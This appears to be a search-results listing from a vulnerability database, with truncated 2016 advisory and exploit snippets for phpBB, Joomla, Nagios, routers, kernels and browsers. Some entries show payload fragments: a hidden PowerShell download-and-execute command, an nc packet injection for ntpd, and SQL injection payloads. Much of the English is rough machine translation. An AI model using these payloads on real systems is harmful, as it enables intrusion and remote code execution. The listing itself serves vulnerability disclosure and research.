56796 matches found
phpBB 2.0.23 - From Variable Tampering to SQL Injection
Case Study Variable Tampering Among others, RIPS reported a variable tampering issue in the style configuration page for administrators. The GET parameter installto is used as the name of a variable. admin/adminstyles.php $installto = isset$HTTPGETVARS'installto' ? urldecode$HTTPGETVARS'installto...
Joomla! Core Remote Privilege Escalation Vulnerability (CVE-2016-9838)
Author: p0wd3r know Chong Yu 404 security lab Date: 2016-12-21 0x00 vulnerability overview 1. Vulnerability description Joomla to 12, on 13, released 3. 6. 5 of the upgrade announcement, the upgrade fixes three security vulnerabilities, wherein the CVE-2016-9838 been officially designated as high...
Nagios Core < 4.2.2 Curl Command Injection/Code Execution (CVE-2016-9565)
Author: p0wd3r, dawu know Chong Yu 404 security lab Date: 2016-12-15 0x00 vulnerability overview 1. Vulnerability description Nagios is a monitoring of the IT infrastructure program, recently security researchers Dawid Golunski discovered in Nagios Core there is a code execution vulnerability: an...
WordPress functions.php theme file Backdoor vulnerability
No description provided by source...
Netgear R6400/R7000/R8000 - Command Injection
Author:p0wd3r,dawuknow Chong Yu 404 security lab Data: 2016-12-13 Update on 12/16 : correction of the original text in a error, thanks to @k0pwn it. 2016 12 month 7 days, foreign websites exploit-db on broke one on the NETGEAR R7000 router command injection vulnerability. Time, each passerby hors...
Roundcube 1.2.2: Command Execution via Email
中文分析:http://paper.seebug.org/138/ Author: p0wd3r, LG 知道创宇404安全实验室 Roundcube is a widely distributed open-source webmail software used by many organizations and companies around the globe. The mirror on SourceForge, for example, counts more than 260,000 downloads in the last 12 months1 which is on...
Firefox - SVG cross domain cookie vulnerability (CVE-2016-9078)
Original link: http://insert-script.blogspot.jp/2016/12/firefox-svg-cross-domain-cookie.html Author: the Alex Inführ Translation: Holic know Chong Yu 404 Safety laboratory , this article has additions and changes Note: the vulnerability only affects Firefox 49 and 50 version, details see the...
ImageMagick Convert Tiff Adobe Deflate 任意代码执行漏洞(CVE-2016-8707)
This vulnerability is present in the convert utility bundled with ImageMagick. Thus utility is used by many web applications to parse and convert images and other formats inter changeably. It is a very popular piece of software for this use. The vulnerability arises when attempting to deflate an...
Linux af_packet.c race condition (local root) (CVE-2016-8655)
To create AFPACKET sockets you need CAPNETRAW in your network namespace, which can be acquired by unprivileged processes on systems where unprivileged namespaces are enabled Ubuntu, Fedora, etc. It can be triggered from within containers to compromise the host kernel. On Android, processes with...
Alcatel Lucent Omnivista 8770 Remote Code Execution(CVE-2016-9796)
No description provided by source. import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...
NETDOIT news_detail.php parameter id SQL injection vulnerability
No description provided by source...
Wordpress Plugin Single Personal Message 1.0.3 SQL injection vulnerability
Author:sebaoknow Chong Yu 404 security lab Date:2016-12-06 1. Vulnerability description Simple Personal Message is for WordPress website dedicated to create the privacy and security of information systems. Using Ajax operation, may be based on a group of users between the station within the...
Wordpress Plugin Olimometer 2.56 - SQL Injection
Vulnerability parameters: olimometerid= Using sqlmap Parameter: olimometerid GET Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometerid=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL = 5.0.12 AND time-based blind Payload: olimometerid=1...
Huawei Flybox B660 Router to bypass authentication vulnerability
Huawei Flybox B660 Router to bypass authentication vulnerability Huawei Flybox B660 Router router device exists to bypass authentication vulnerability. Due to local path"./ htmlcode/html/"module and"indexdefault. asp"file exists vulnerability, a remote unauthenticated attacker could exploit the...
Android V8 JavaScript engine arbitrary code execution vulnerability, CVE-2016-6754) (BadKernel)
For details, please refer to: https://github.com/secmob/BadKernel/blob/master/BadKernel-syscan2016.pdf function gc forvar i=0;i0.toString16; function log var str = ""; forvar i=0;i"; console.logstr; document.writestr; function setaccessaddressaddress controllerdv.setUint3234,address,true;...
New Firefox/Tor Browser 0-day vulnerability (CVE-2016-9079)
No description provided by source. var worker = new Worker'data:javascript,self.onmessage=functionmsgpostMessage"one";postMessage"two";;'; worker.postMessage"zero"; var svgns = 'http://www.w3.org/2000/svg'; worker.onmessage = functione containerA.pauseAnimations; var craftDOM = function container...
Red Hat JBoss EAP - Deserialization of Untrusted Data
1.Abstract. JBoss EAP's JMX Invoker Servlet is exposed by default on port 8080/TCP. The communication employs serialized Java objects, encapsulated in HTTP requests and responses. The server deserializes these objects without checking the object type. This behavior can be exploited to cause a...
Jenkins remoting module remote command execution vulnerability, CVE-2016-9299)
No description provided by source...
FreeBSD 8.0, 7.3 and 7.2 nfs_mount() denial of service vulnerability
No description provided by source. Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2 include include include include include include include include include include include include include define BUFSIZE 272 define FSNAME "nfs" define DIRPATH "/tmp/nfs" unsigned char kernelcode =...
uSQLite 1.0.0 buffer overflow vulnerability
Vulnerability reproduction uSQLite is SQLite a network package tool 它有一个Server工具uSQLiteServer.exe open will open the 3002 port is responsible for processing connected to the case, in the received data, when receiving a malformed data, since the data is not to judge, so because of the sprintf...
emlog album plug-in kl_album_ajax_do.php SQL injection vulnerability
Fromhttp://www.leavesongs.com/PENETRATION/emlog-important-plugin-getshell.html Check EM album plug-in source code, 看到klalbumajaxdo.php to: query"INSERT INTO ". DBPREFIX."klalbumtruename, fi...
Apache Tomcat Remote Code Execution(CVE-2016-8735)
Update 12/04 : the need to note that in conf/server,xml to increase the configuration, you need the catalina-jmx-remote. the jar and the groovy-2.3.9. jar package into lib directory And modify the CATALINAOPTS"-Dcom. sun. management. jmxremote. ssl=false-Dcom. sun. management. jmxremote...
SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML external entity injection vulnerability
1 It is possible, that an attacker can perform a DoS attack for example, an XML Entity expansion attack 2 An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the attacker, then relays the credentials to the target. T...
ntpd remote pre-auth DoS (CVE-2016-7434)
poc echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\ | "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123 Valgrind report $ sudo valgrind ./ntpd/ntpd -n -c /resources/ntp.conf | | ==5389== Memcheck, a memory error detector | | ==5389== Copyright C 2002-201...
Geovision IP Camera device weak password vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase class TestPOCPOCBase: vulID = '' ssvid version = '1.0' author = 'Hcamael' vulDate = '2016-11-11' createDate...
Wordpress Plugin Answer My Question 1.3 - SQL Injection
1 - Description $POST'id' is not escaped. Url is accessible for any user. http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/ 2 - Proof of Concept html...
Dolphin 7.3.2 authentication bypass and command execution vulnerabilities
No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected] Auth bypass trick credit go to...
Grandstream HT701 IP analog telephone adapter background of the weak password vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re class TestPOCPOCBase: vulID = '' ssvid version = '1.0' author = 'Hcamael' vulDate = '2016-11-11'...
Apache Tika remote code execution vulnerability(CVE-2016-6809)
No description provided by source...
Chrome the improper use of Flash message loop leads to the UXSS Vulnerability, CVE-2016-1631)
Author: Avfisher@network sharp knife 0x00 Preface This writing comes from a few days ago a buddy sent me a bug link to let the author help explain the vulnerability principle, in order to facilitate the partner understanding and left notes for future reference and then write this article. This...
The Microsoft DirectX graphics kernel subsystem elevation of privilege vulnerability MS16-062)
来源: 腾讯科恩实验室官方博客 作者: Daniel King @long123king 如何攻破微软的Edge浏览器 攻破微软的Edge浏览器至少需要包含两方面基本要素:浏览器层面的远程代码执行RCE: Remote Code Execution和浏览器沙箱绕过。 浏览器层面的远程代码执行通常通过利用Javascript脚本的漏洞完成,而浏览器的沙箱绕过则可以有多种方式,比如用户态的逻辑漏洞,以及通过内核漏洞达到本地提权EoP: Escalation of Privilege。...
Network Scanner 4.0.0 - SEH Local Buffer Overflow
Author: k0Sh1 Vulnerability reproduction Network Scanner is a scan tool, which has a directed domain scanning function, but this function for loading the string is not strict control, such as Textbox length, or the length of the checksum result if you do not enter the domain name, but change the...
GNU GTypist 2.9.5-2 - Local buffer overflow vulnerability
Author: k0Sh1 Vulnerability analysis GNU GTypist is a Linux text editing software, more awkward is in my debugging process, we found gtypist actually open the CNARAY and NX, that is, in accordance with the PoC given in the Exploit should be unable to take advantage of, this should be a denial of...
PHP 'ext/phar/phar_object. c' heap overflow vulnerability, CVE-2016-4342)
Parse . tar/. zip/. phar file, the stack boundary condition control is not strict, leading to possible heap overflow. Create a new empty file"aaaa"0 byte, packaged into a "aaaa. tar"file is not compressed before the aaaa file size is 0 it. By PharFileInfo object getContent method to get the aaaa...
Cryptsetup Initrd LUKS root Shell privilege escalation vulnerability
Description A vulnerability in Cryptsetup, concretely in the scripts that unlock the system partition when the partition is ciphered using LUKS Linux Unified Key Setup. The disclosure of this vulnerability was presented as part of our talk "Abusing LUKS to Hack the System" in the DeepSec 2016...
Apache Shiro remote security restriction bypass Vulnerability, CVE-2016-6802)
Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging the use of a non-root servlet context path. shiro in the path control, the attacker can bypass the filter to access filtered path, the impact of the version shrio 1.3.2 From the above figur...
Nginx privilege elevation vulnerability (Debian, Ubuntu distributions)
Discovered by: Dawid Golunski - dawidatlegalhackers.com - https://legalhackers.com - Release date: 15.11.2016 - Revision 1.0 I. VULNERABILITY ------------------------- Nginx Debian-based distros - Root Privilege Escalation Fixed in 1.6.2-5+deb8u3 package on Debian, and 1.10.0-0ubuntu0.16.04.3 on...
vlcms_v1. 2 two sql injection vulnerabilities
No description provided by source...
YxtCMF network classroom reception filter does not strictly lead to SQL injection vulnerabilities
No description provided by source...
vlcms_v1. 2 arbitrary file read vulnerability
No description provided by source...
Spring Data JPA Blind SQL Injection Vulnerability
PoC for blind SQL injection bug found in Solita Webhack 2016. Founders: Niklas Särökaari, Joona Immonen Analysis: Arto Santala, Niklas Särökaari, Joona Immonen, Antti Virtanen, Michael Holopainen PoC: Antti Ahola, Antti Virtanen CVE: https://pivotal.io/security/cve-2016-6652 This has been fixed i...
e107 CMS-2.1.1 privilege elevation vulnerability
No description provided by source. $login, 'userpass' = $pass, 'userlogin' = 'Sign In'; curlsetopt$ch, CURLOPTPOST, 1; $content = curlexec$ch; if strpos$content, '?logout' === false die"Cannot login"; $data = array; $data'useradmin' = 1; $data'userperms' = 0; $data'userpassword' = md5$pass;...
Microsoft Windows Internet Explorer the animation Manager memory corruption vulnerability (MS16-132)
Exploitation Exploitation of this vulnerability requires a user to visit a page containing specially crafted JavaScript. Users can generally be lured to visit web pages via email, instant message or links on the internet. Vulnerabilities like thisare often hosted on legitimate websites which have...
The Windows Local Security authentication subsystem service LSASS remote memory corruption vulnerability MS16-137)
In an attacker to send a carefully camouflaged application, the local security authentication subsystem service LSASS memory damage caused by a denial of service vulnerability A vulnerability in the Windows Local Security Authority Subsystem Service LSASS was found on Windows OS versions ranging...
Win32k elevation of privilege vulnerability MS16-135)(CVE-2016-7255)
If the Windows kernel-mode drivers do not properly handle objects in memory, then there will be multiple elevation of Privilege vulnerabilities. Successful exploitation of this vulnerability an attacker can run in kernel mode arbitrary code. An attacker could then install programs; view, change, ...
Piwik <= 2.16.0 (saveLayout) PHP object injection vulnerability
The vulnerability can be triggered through the saveLayout method defined in /plugins/Dashboard/Controller.php: 210. public function saveLayout 211. 212. $this-checkTokenInUrl; 213. 214. $layout = Common::unsanitizeInputValueCommon::getRequestVar'layout'; 215. $layout = striptags$layout; 216...
Loopcomm WLAN AP Webserver 未授权访问漏洞
No description provided by source...
GitLab 任意用户 authentication tokens 泄漏导致远程代码执行漏洞
漏洞分析参考: http://paper.seebug.org/104/ The project export feature serializes the user objects of team members and stores it in the project.json file. This object contains the authenticationtoken for every user, meaning that an attacker can simply go ahead and create a project on GitLab.com, add one...
Sophos Web Appliance v4. 2. 1. 3 remote code execution vulnerability
Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as: POST /index.php?c=logs HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.10; rv:46.0 Gecko/20100101 Firefox/46.0 Accept: text/javascript, text/html,...
GNU tar(POINTYFEATHER) decompression path bypass vulnerability
Vulnerability analysis reference: http://paper.seebug.org/103/ Overview GNU tar' archiver can be tricked into extracting files and directories in the given destination, regardless of the path names specified on the command line. Description GNU tar' archiver attempts to avoid path traversal attac...